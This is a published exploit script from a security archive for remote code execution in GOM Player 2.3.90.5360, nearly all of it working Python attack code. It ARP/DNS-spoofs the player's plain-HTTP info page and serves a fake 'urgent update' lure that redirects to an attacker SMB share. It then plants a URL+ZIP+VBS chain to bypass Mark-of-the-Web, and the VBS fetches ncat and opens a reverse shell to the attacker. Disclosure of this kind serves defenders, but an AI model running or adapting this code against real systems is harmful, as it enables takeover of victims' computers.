HistoryAug 29, 2023 - 12:00 a.m.

GOM Player 2.3.90.5360 MITM / Remote Code Execution

2023-08-29 00:00:00
M. Akil Gundogan
packetstormsecurity.com
`# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)  
# Date: 26.08.2023  
# Author: M. Akil Gündoğan  
# Contact: https://twitter.com/akilgundogan  
# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/  
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE  
# Version: 2.3.90.5360   
# Tested on: Windows 10 Pro x64 22H2 19045.3324  
# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8  
  
# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.  
  
# Vulnerability Description:
# The embedded IE view in GOM Player's interface loads playinfo.gomlab.com over plain HTTP, so the content is neither
# encrypted nor authenticated. An attacker on the same network segment who can spoof the target's DNS (and ARP)
# therefore controls what that embedded browser renders. Because this IE view follows "search-ms:" URLs
# (the SMB/WebDAV "search-ms" technique), the attacker's page redirects the victim into an Explorer search view of an
# attacker-controlled SMB share, from which the planted shortcut executes code on the target.
# In addition, the URL+ZIP+VBS MoTW bypass technique is used so that the victim sees no security warning in the pop-up window.
  
# Full disclosure, developers should be more careful about software security.  
  
# Exploit Usage: Run it as root (it performs DNS/ARP spoofing and binds port 80 plus an SMB server), enter the IP address of
# the target, then the port to listen on for the reverse shell. The attacker must be on the same L2 segment as the target for
# the ARP/DNS spoofing to work, and the attack only completes once the victim opens GOM Player and clicks the planted shortcut.
  
# Some spaghetti and a bad code but it works :)  
  
# Start-up banner: a red (256-colour code 196) box with the title, followed by
# a cyan (117) author line.  The third box line is Turkish, roughly "Tested,
# it failed the class. This game will never end :-)".
_BOX_EDGE = "+-----------------------------------------------------------+"
banner = "\n".join([
    "\033[38;5;196m" + _BOX_EDGE,
    "| GOM Player 2.3.90.5360 - Remote Code Execution |",
    "| Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-) |",
    _BOX_EDGE + "\033[0m",
    "\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m",
])
  
import ipaddress
import os
import socket
import subprocess
import sys
import time
import zipfile
  
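print(banner)

# DNS/ARP spoofing, raw ARP probes and binding port 80 all require root.
if os.geteuid() != 0:
    print("You need root privileges to run the exploit, please use sudo...")
    sys.exit(1)


def _ask_ipv4(prompt):
    """Prompt until the operator enters a syntactically valid IPv4 address.

    The value is later interpolated into command lines (dnsspoof, ping,
    arping), so it is validated at the input boundary instead of being passed
    through verbatim.  Only IPv4 is accepted: the rest of the script uses
    `ip -4 route` and embeds the address in UNC paths.

    Returns:
        The normalised dotted-quad address as a str.
    """
    while True:
        value = input(prompt).strip()
        try:
            return str(ipaddress.IPv4Address(value))
        except ValueError:
            print("  '" + value + "' is not a valid IPv4 address, try again.")


def _ask_port(prompt):
    """Prompt until the operator enters a TCP port number in 1-65535.

    Returns:
        The port as a str (leading zeros removed); callers concatenate it
        into the VBS payload and the nc/ncat command lines.
    """
    while True:
        value = input(prompt).strip()
        if value.isdigit() and 1 <= int(value) <= 65535:
            return str(int(value))
        print("  '" + value + "' is not a valid port number (1-65535), try again.")


targetIP = _ask_ipv4("- Target IP address: ")
listenPort = _ask_port("- Listening port for Reverse Shell: ")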
  
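def fCreate(fileName, fileContent):
    """Write *fileContent* to *fileName*, replacing any existing file.

    Args:
        fileName: path of the file to create.
        fileContent: text to write.

    The file is always written as UTF-8 regardless of locale: the lure page
    declares ``<meta charset="utf-8">`` and contains non-ASCII text, while the
    VBS and .url payloads are plain ASCII, so UTF-8 is correct for all of them.
    The original open()/write()/close() sequence leaked the handle if write()
    raised; the context manager closes it on every path.
    """
    with open(fileName, "w", encoding="utf-8") as fh:
        fh.write(fileContent)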
  
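# Work out this host's default gateway and the IPv4 address it uses to reach
# it.  That address is embedded in every payload below (UNC path, .url file,
# reverse-shell target), so it must be the one the victim can actually reach.
try:
    routeProc = subprocess.run(["ip", "-4", "route", "show", "default"],
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                               universal_newlines=True)
except OSError as err:
    print("Could not run 'ip route': " + str(err))
    sys.exit(1)
gw = routeProc.stdout.split()
# Expected shape: "default via <gateway> dev <iface> ...".  The original
# indexed gw[2] blindly and raised IndexError when no default route existed.
if routeProc.returncode != 0 or len(gw) < 3 or gw[0] != "default":
    print("No IPv4 default route found; cannot determine the attacker IP.")
    sys.exit(1)
gateway = gw[2]
# connect() on a UDP socket sends nothing but makes the kernel choose the
# source address it would use towards the gateway - our LAN-facing IP.
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
    s.connect((gateway, 0))
    ipaddr = s.getsockname()[0]
host = socket.gethostname()
print("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host)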
  
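print("\n[*]- Stage 1: Downloading neccesary tools...")

smbFolderName = "GomUpdater"  # name of the SMB share the victim sees (optional)
expWorkDir = "gomExploitDir"  # working directory for everything below (optional)


def _run_quiet(argv, cwd=None):
    """Run *argv* (an argument list, no shell) with all output discarded.

    Returns:
        True when the command exited with status 0.  A missing binary
        (OSError) is reported as failure instead of a traceback.
    """
    try:
        rc = subprocess.call(argv, cwd=cwd,
                             stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    except OSError:
        return False
    return rc == 0


# The original forked `mkdir ... &` into the background and slept for
# "stability"; creating the tree synchronously removes that race entirely.
smbShareDir = os.path.join(expWorkDir, "smb-shared")
webShareDir = os.path.join(expWorkDir, "web-shared")
os.makedirs(smbShareDir, exist_ok=True)
os.makedirs(webShareDir, exist_ok=True)

# SUPPLY-CHAIN NOTE: nothing fetched here is integrity-checked.  The ncat
# archive is downloaded without any checksum or signature verification and
# both repositories are cloned at whatever HEAD is today; pin a release/commit
# and verify hashes before relying on this tooling.
ncatZip = "ncat-portable-5.59BETA1.zip"
if not (_run_quiet(["wget", "https://nmap.org/dist/" + ncatZip], cwd=smbShareDir)
        and _run_quiet(["unzip", "-o", "-j", ncatZip], cwd=smbShareDir)):
    # The original swallowed this failure and only broke later, at Stage 7.
    print(" [!] - Failed to download or unpack ncat (network down, or wget/unzip missing?)")
    sys.exit(1)
# Only ncat.exe should be exposed on the share: drop the archive and its README.
for leftover in (ncatZip, "README"):
    try:
        os.remove(os.path.join(smbShareDir, leftover))
    except FileNotFoundError:
        pass
print(" [*] - Ncat has been downloaded.")


def _clone(repoUrl, destDir, markerPath, label):
    """git-clone *repoUrl* into *destDir* unless *markerPath* already exists.

    A previous run leaves the checkout in place (git then refuses to clone
    into the non-empty directory); an existing checkout is accepted as success,
    which matches what the original's ignored exit status did in practice.
    Exits the script if the marker file is still missing afterwards.
    """
    if not os.path.exists(markerPath):
        _run_quiet(["git", "clone", repoUrl, destDir])
    if not os.path.exists(markerPath):
        print(" [!] - Failed to clone " + label + " (git installed? network up?)")
        sys.exit(1)
    print(" [*] - " + label + " has been downloaded.")


_clone("https://github.com/fortra/impacket.git",
       os.path.join(expWorkDir, "impacket"),
       os.path.join(expWorkDir, "impacket", "examples", "smbserver.py"),
       "Impacket")
_clone("https://github.com/dtrecherel/DNSSpoof.git",
       os.path.join(expWorkDir, "dnsspoof"),
       os.path.join(expWorkDir, "dnsspoof", "dnsspoof.py"),
       "DNSSpoof.py")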
  
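print("[*]- Stage 2: Creating Attacker SMB Server...")
# Serve <expWorkDir>/smb-shared as \\<ip>\<smbFolderName> with impacket's
# smbserver.py.  It is started from the examples directory so the relative
# share path "../../smb-shared" resolves as in the original.  The original
# line was missing the opening quote before "/impacket/examples" and did not
# even parse; it is rebuilt here as an argument list (no shell).
try:
    smbProc = subprocess.Popen(
        ["python3", "smbserver.py", smbFolderName, "../../smb-shared", "-smb2support"],
        cwd=os.path.join(expWorkDir, "impacket", "examples"),
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except OSError as err:
    print(" [!] - Could not start smbserver.py: " + str(err))
    sys.exit(1)
time.sleep(5)  # give smbserver.py time to bind before the lure is served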
  
smbIP = ipaddr
# Host name that GOM Player's embedded IE view fetches over plain HTTP.  The DNS
# spoofer answers queries for this name with our address, so the page below is
# what the player renders.
spoofUrl = "playinfo.gomlab.com"

print("[*]- Stage 3: Creating Attacker Web Page...")

# Lure page (customisable).  The alert text is Turkish for "GOM Player needs an
# urgent update! Please click the updater in the window that opens."; the
# redirect then opens a search-ms: view of our SMB share, where Updater.url sits.
_searchMsUrl = ("search-ms:displayname=GOM Player Updater"
                "&crumb=System.Generic.String%3AUpdater"
                "&crumb=location:%5C%5C" + smbIP)
screenExpPage = "\n".join([
    "",
    '<meta charset="utf-8">',
    '<script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater\'a tıklayın.");</script>',
    "<script>window.location.href= '" + _searchMsUrl + "';",
    "</script>",
    "",
])

fCreate(os.path.join(expWorkDir, "web-shared", "screen.html"), screenExpPage)
time.sleep(3)  # kept from the original: "necessary for exploit stability"
  
print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")

# VBS dropper (customisable): copies ncat.exe from our SMB share into %temp%
# and launches it as a reverse shell back to us.  Python escaping: "\\\\" in
# the source becomes the UNC "\\" prefix in the written file.
_vbsLines = [
    'Set shell=CreateObject("wscript.shell")',
    'Shell.Run("xcopy /y \\\\' + smbIP + '\\' + smbFolderName + '\\ncat.exe %temp%")',
    'WScript.Sleep 5000',
    'Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe ' + smbIP + ' ' + listenPort + ' -e cmd")',
]
vbsCommand = "\n".join(_vbsLines)
payload_filename = os.path.join(expWorkDir, "payload.vbs")
fCreate(payload_filename, vbsCommand)

# Internet shortcut placed on the share; it points straight at the VBS inside
# the zip (the URL+ZIP+VBS chain described in the header).
urlShortcut = "\n".join([
    "[InternetShortcut]",
    "URL=file://" + smbIP + "/" + smbFolderName + "/archive.zip/payload.vbs",
    "IDlist=",
])
_shareDir = os.path.join(expWorkDir, "smb-shared")
fCreate(os.path.join(_shareDir, "Updater.url"), urlShortcut)
time.sleep(3)  # kept from the original: "necessary for exploit stability"

zipName = os.path.join(_shareDir, "archive.zip")
with zipfile.ZipFile(zipName, "w") as archive:
    # Store only the bare file name, not the expWorkDir/ prefix.
    archive.write(payload_filename, arcname=os.path.basename(payload_filename))
  
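print("[*]- Stage 5: Running the attacker's web server...")
# Serve the lure page on port 80 (root was checked at start-up).  Handles of
# the processes started here are kept so they can be terminated at the end
# instead of being pkill'ed by name.
try:
    httpProc = subprocess.Popen(
        ["python3", "-m", "http.server", "80"],
        cwd=os.path.join(expWorkDir, "web-shared"),
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except OSError as err:
    print(" [!] - Could not start the web server: " + str(err))
    sys.exit(1)
time.sleep(3)  # let http.server bind before the target's DNS is redirected

print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
# dnsspoof.py answers the target's queries for spoofUrl with our address.
# targetIP and spoofUrl are passed as argv entries, never through a shell.
try:
    dnsProc = subprocess.Popen(
        ["python3", os.path.join(expWorkDir, "dnsspoof", "dnsspoof.py"),
         "-d", spoofUrl, "-t", targetIP],
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except OSError as err:
    print(" [!] - Could not start dnsspoof.py: " + str(err))
    httpProc.terminate()
    sys.exit(1)
time.sleep(10)  # kept from the original: "necessary for exploit stability"
# Background ping/arping probes, as in the original (presumably to refresh
# the target's ARP/neighbour state - the original gives no reason).  Best
# effort: arping in particular may not be installed.
for probe in (["ping", "-c", "5", targetIP], ["arping", "-c", "5", targetIP]):
    try:
        subprocess.Popen(probe, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    except OSError:
        pass

print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
# Blocks until the shell session ends (or Ctrl-C).  nc receives argv directly,
# so listenPort is never interpreted by a shell.
try:
    subprocess.run(["nc", "-lvnp", listenPort])
except OSError as err:
    print(" [!] - Could not start the nc listener: " + str(err))
finally:
    # Stop what we started, also on Ctrl-C (the original only cleaned up when
    # nc exited normally).  smbserver.py was launched in an earlier stage
    # without keeping its handle, so it is still matched by name; note that
    # `pkill -f` kills ANY process whose command line contains the pattern.
    for proc in (dnsProc, httpProc):
        proc.terminate()
    subprocess.run(["pkill", "-f", "smbserver.py"])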
`